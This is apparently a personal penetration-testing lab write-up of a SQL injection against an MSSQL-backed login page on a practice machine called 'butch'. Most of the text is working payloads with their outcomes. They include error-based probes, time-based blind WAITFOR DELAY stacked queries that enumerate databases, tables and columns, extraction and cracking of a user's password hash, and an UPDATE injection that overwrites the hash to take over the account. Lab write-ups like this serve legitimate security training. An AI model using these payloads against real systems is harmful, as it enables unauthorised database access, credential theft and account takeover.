InfoSec LAB

Butch_SQLi

Created: 4 min read

SQL Injection

The target web application has a SQL injection vulnerability present at the username parameter of the login page Based on the returned error message, the backend DB appears to be MSSQL Given this is a login page with the returned SQL error, both Error-based and Blind SQLi can be performed

Error-based (Partial)

' OR 1/0 = 1 -- Runtime errors (e.g., CAST, CONVERT) are suppressed by the application’s try-catch block. Opting out to the error-based technique listed in the online resource for PARTIAL data leak

' HAVING 1=1 -- There is a column, username, within the users table in the current database

' GROUP BY users.username HAVING 1=1 -- There is also a column, password_hash, within the users table in the current database

Time-based Blind (Stacked Query)

1'; WAITFOR DELAY '0:0:10'-- Web app hanged for about 10 seconds to respond Stacked Query works with MSSQL

1' UNION SELECT NULL,NULL-- There appears to be 2 columns This is rather irrelevant as we could continue with the stacked query and this is a blind SQLi

1'; IF EXISTS (SELECT 1 WHERE CURRENT_USER LIKE '%') WAITFOR DELAY '0:0:5'-- 1'; IF EXISTS (SELECT 1 WHERE CURRENT_USER LIKE 'butc%') WAITFOR DELAY '0:0:5'-- 1'; IF EXISTS (SELECT 1 WHERE CURRENT_USER='butch') WAITFOR DELAY '0:0:5'-- The current user is butch

1'; IF EXISTS (SELECT 1 WHERE HOST_NAME() LIKE 'b%') WAITFOR DELAY '0:0:5'--

1'; IF EXISTS (SELECT 1 WHERE HOST_NAME()='butch') WAITFOR DELAY '0:0:5'-- The hostname is butch

1'; IF EXISTS (SELECT 1 WHERE DB_NAME()='butch') WAITFOR DELAY '0:0:5'-- The current DB is also butch

Database

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name LIKE '§§%') WAITFOR DELAY '0:0:5'-- 3 DBs starts with b, m, and t

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name LIKE 'm§§%') WAITFOR DELAY '0:0:5'-- 3 DBs starts with a, o, and s

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='butch') WAITFOR DELAY '0:0:5'-- The current butch DB

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='master') WAITFOR DELAY '0:0:5'-- master DB

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='model') WAITFOR DELAY '0:0:5'-- The default model DB

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='msdb') WAITFOR DELAY '0:0:5'-- The default msdb DB

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='tempdb') WAITFOR DELAY '0:0:5'-- The default tempdb DB

Tables

1'; IF EXISTS (SELECT 1 FROM information_schema.tables WHERE table_catalog='butch' AND table_name LIKE '§§%') WAITFOR DELAY '0:0:5'-- There is a table starts with u in the butch DB

1'; IF EXISTS (SELECT 1 FROM information_schema.tables WHERE table_catalog='butch' AND table_name='users') WAITFOR DELAY '0:0:5'-- butch.users

Columns

1'; IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_catalog='butch' AND table_name='users' AND column_name='username') WAITFOR DELAY '0:0:5'-- butch.users.username

1'; IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_catalog='butch' AND table_name='users' AND column_name LIKE 'password%') WAITFOR DELAY '0:0:5'-- The column name seems to be password, but it cannot be confirmed with the = operator

Fix

The reason for this is because the wordlist was missing special characters

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ cat /usr/share/wordlists/_all_ascii_chars.txt | tr -d '\n'  
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

Trying again with the entire ASCII table

The next character after password was the underscore character; _

It seems to be case-insensitive; h

password_ha

1'; IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_catalog='butch' AND table_name='users' AND column_name='password_hash') WAITFOR DELAY '0:0:5'-- Found a column; butch.users.password_hash

Credential Exfiltration (butch.dbo.users)

1'; IF EXISTS (SELECT 1 FROM butch.dbo.users WHERE username='butch') WAITFOR DELAY '0:0:5'-- Found a user; butch

1'; IF EXISTS (SELECT 1 FROM butch.dbo.users WHERE password_hash LIKE '%') WAITFOR DELAY '0:0:5'-- Brute Forcing

1'; IF EXISTS (SELECT 1 FROM butch.dbo.users WHERE password_hash='e7b2b06dd8acded117d6d075673274c4ecdc75a788e09e81bffd84f11af6d267') WAITFOR DELAY '0:0:5'-- Found the password hash for the butch user; e7b2b06dd8acded117d6d075673274c4ecdc75a788e09e81bffd84f11af6d267

Password Cracking

Password hash cracked; awesomedude

Validation

Authentication successful

File Upload

Redirected to the /repo.aspx endpoint that supports file upload Moving on to the Exploitation phase

Updating Password of butch (Stacked Query)

This method only works if the type of hash used in the password_hash column is known

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ echo -n 'qwe123' | md5sum   
200820e3227815ed1756a6b531e7e0d2  -
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ echo -n 'qwe123' | sha1sum
c53255317bb11707d0f614696b3ce6f221d0e2f2  -
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ echo -n 'qwe123' | sha256sum
18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63  -

If unknown, it can be “brute-forced” via attempting common types of hashing algorithm

'; UPDATE users SET password_hash = '18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63' WHERE username = 'butch';-- Using SHA-256 hashing algorithm The web app returned no SQL error as the SQL query is valid

I can then authenticate using the updated credential; butch:qwe123

Interactive Graph View

Backlinks